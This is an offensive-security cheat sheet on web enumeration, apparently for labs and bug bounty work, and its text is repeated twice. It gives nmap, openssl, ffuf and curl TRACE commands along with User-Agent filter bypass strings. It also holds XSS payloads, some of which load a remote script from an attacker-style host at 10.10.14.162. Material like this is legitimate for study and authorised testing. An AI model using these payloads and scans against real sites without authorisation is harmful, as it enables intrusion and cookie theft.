Web Enumeration

Last updated 2 months ago

Web Enumeration

Check-List

Check robots.txt
Check .git
Use TRACE method
Force error messages

Nmap Scripts

Scan for config files

nmap -n -p<PORT> --script http-config-backup <IP>

Site map generator

nmap -Pn -script=http-sitemap-generator scanme.nmap.org

Stealthy Scan

nmap -n -Pn -vv -O -sV --script=http-enum,http-headers,http-methods,http-title,http-vuln* 192.168.1.1

fast scan

nmap -n -Pn -p 80 -open -sV -vvv -script banner,http-title -iR 1000

Forms

Markdown

Test for XSS , HTML injection and JavaScript execution:

Malicious Md file

### local XSS
<img src=x onerror=alert(1) />

### load image
<img src="http://10.10.14.162:8000/image.png" />

### load script
<script src="http://10.10.14.162:8000/script.js"></script>

### Md
<img src='http://10.10.14.162:8000/test.md' />

TRACE Method

`Checking for Cross-Site Tracing (XST) – Bypassing HttpOnly Cookies`

If TRACE is enabled and the response reflects cookies, an attacker can bypass the HttpOnly flag.
Normally, HttpOnly prevents JavaScript from accessing cookies, but TRACE can leak them if not properly restricted.

POC

curl -X TRACE https://target.com -H "Test: XST"

If the response includes the custom header, TRACE is enabled.
If it leaks Set-Cookie headers, it’s a serious security issue.
Bug Bounty Impact:

`Finding Internal Headers & Debug Info`

Some servers return sensitive internal headers when TRACE is enabled, such as:

X-Forwarded-For --> Real client IP leak.
X-Backend-Server --> Internal server exposure.
Via --> Reveals proxy setup.

POC

curl -X TRACE https://target.com

Look for unusual headers in the response.
Bug Bounty Impact: Information Disclosure

`Finding WAF / Security Device Bypasses`

Some WAFs don’t inspect TRACE requests properly.
You can use TRACE to test whether WAF protections apply to certain endpoints.

POC

curl -X TRACE https://target.com/index.php --data "payload=<script>alert(1)</script>"

If TRACE reflects the payload, but normal requests are blocked, the WAF is bypassable.

`Checking for Cross-Origin Attacks`

If TRACE is enabled, it might allow same-origin policy (SOP) bypasses.
Some older browsers or misconfigured CORS setups can be exploited if TRACE echoes requests cross-origin.

Browser DevTools

Show devtools

[CTRL+SHIFT+I] or [F12]

Show Network tab

[CTRL+SHIFT+E]

Show Console tab

[CTRL+SHIFT+K]

Bypass User-Agent filtering

Experiment with those User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.81
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0

Website Fingerprinting

Or in the command line:

whatweb -v 10.10.10.121

Website banners

curl -IL https://www.inlanefreight.com

SSL Certificates

Use openssl to get the certificate's info:

echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text

Grep for subdomains

echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text | grep DNS | tr "," "\n" | cut -d: -f2

Create a custom wordlist with the subdomains to fuzz for response codes and gain a general idea of the content:

 ffuf -c -w domains -u https://FUZZ

When working with HTTPS is good practice to validate the SSL/TLS version and ciphers in use:

openssl s_client -connect 10.10.10.124:443 -servername 10.10.10.124 -showcerts

You can follow up with the -cipher flag to specify the cipher suites you're interested in:

openssl s_client -connect 10.10.10.124:443 -servername 10.10.10.124 -cipher ECDHE-RSA-AES256-GCM-SHA384

Check if the server implements HSTS by looking for it's header:

curl -I https://10.10.10.124

Create Word-lists

Use crunch

crunch <min_length> <max_length> -t <pattern> -o <output_file>

CGI Scripts

Shellshock Vulnerability Check

sudo nmap --script http-shellshock --script-args uri=<URL_ARCHIVO_SH> -p80 <IP>

PreviousBinaries NextUser Endpoints

Last updated 2 months ago

Check-List

Check robots.txt
Check .git
Use TRACE method
Force error messages

Nmap Scripts

Scan for config files

nmap -n -p<PORT> --script http-config-backup <IP>

Site map generator

nmap -Pn -script=http-sitemap-generator scanme.nmap.org

Stealthy Scan

nmap -n -Pn -vv -O -sV --script=http-enum,http-headers,http-methods,http-title,http-vuln* 192.168.1.1

fast scan

nmap -n -Pn -p 80 -open -sV -vvv -script banner,http-title -iR 1000

Forms

Markdown

Test for XSS , HTML injection and JavaScript execution:

Malicious Md file

### local XSS
<img src=x onerror=alert(1) />

### load image
<img src="http://10.10.14.162:8000/image.png" />

### load script
<script src="http://10.10.14.162:8000/script.js"></script>

### Md
<img src='http://10.10.14.162:8000/test.md' />

TRACE Method

`Checking for Cross-Site Tracing (XST) – Bypassing HttpOnly Cookies`

If TRACE is enabled and the response reflects cookies, an attacker can bypass the HttpOnly flag.
Normally, HttpOnly prevents JavaScript from accessing cookies, but TRACE can leak them if not properly restricted.

POC

curl -X TRACE https://target.com -H "Test: XST"

If the response includes the custom header, TRACE is enabled.
If it leaks Set-Cookie headers, it’s a serious security issue.
Bug Bounty Impact:

`Finding Internal Headers & Debug Info`

Some servers return sensitive internal headers when TRACE is enabled, such as:

X-Forwarded-For --> Real client IP leak.
X-Backend-Server --> Internal server exposure.
Via --> Reveals proxy setup.

POC

curl -X TRACE https://target.com

Look for unusual headers in the response.
Bug Bounty Impact: Information Disclosure

`Finding WAF / Security Device Bypasses`

Some WAFs don’t inspect TRACE requests properly.
You can use TRACE to test whether WAF protections apply to certain endpoints.

POC

curl -X TRACE https://target.com/index.php --data "payload=<script>alert(1)</script>"

If TRACE reflects the payload, but normal requests are blocked, the WAF is bypassable.

`Checking for Cross-Origin Attacks`

If TRACE is enabled, it might allow same-origin policy (SOP) bypasses.
Some older browsers or misconfigured CORS setups can be exploited if TRACE echoes requests cross-origin.

Browser DevTools

Show devtools

[CTRL+SHIFT+I] or [F12]

Show Network tab

[CTRL+SHIFT+E]

Show Console tab

[CTRL+SHIFT+K]

Bypass User-Agent filtering

Use to check the User-Agent from any client.

Experiment with those User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.81
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0

Website Fingerprinting

Or in the command line:

whatweb -v 10.10.10.121

Website banners

curl -IL https://www.inlanefreight.com

SSL Certificates

Use openssl to get the certificate's info:

echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text

Grep for subdomains

echo | openssl s_client -showcerts -servername 10.10.10.124 -connect 10.10.10.124:443 2>/dev/null | openssl x509 -inform pem -noout -text | grep DNS | tr "," "\n" | cut -d: -f2

Create a custom wordlist with the subdomains to fuzz for response codes and gain a general idea of the content:

 ffuf -c -w domains -u https://FUZZ

When working with HTTPS is good practice to validate the SSL/TLS version and ciphers in use:

openssl s_client -connect 10.10.10.124:443 -servername 10.10.10.124 -showcerts

You can follow up with the -cipher flag to specify the cipher suites you're interested in:

openssl s_client -connect 10.10.10.124:443 -servername 10.10.10.124 -cipher ECDHE-RSA-AES256-GCM-SHA384

Check if the server implements HSTS by looking for it's header:

curl -I https://10.10.10.124

Create Word-lists

Use crunch

crunch <min_length> <max_length> -t <pattern> -o <output_file>

CGI Scripts

Shellshock Vulnerability Check

sudo nmap --script http-shellshock --script-args uri=<URL_ARCHIVO_SH> -p80 <IP>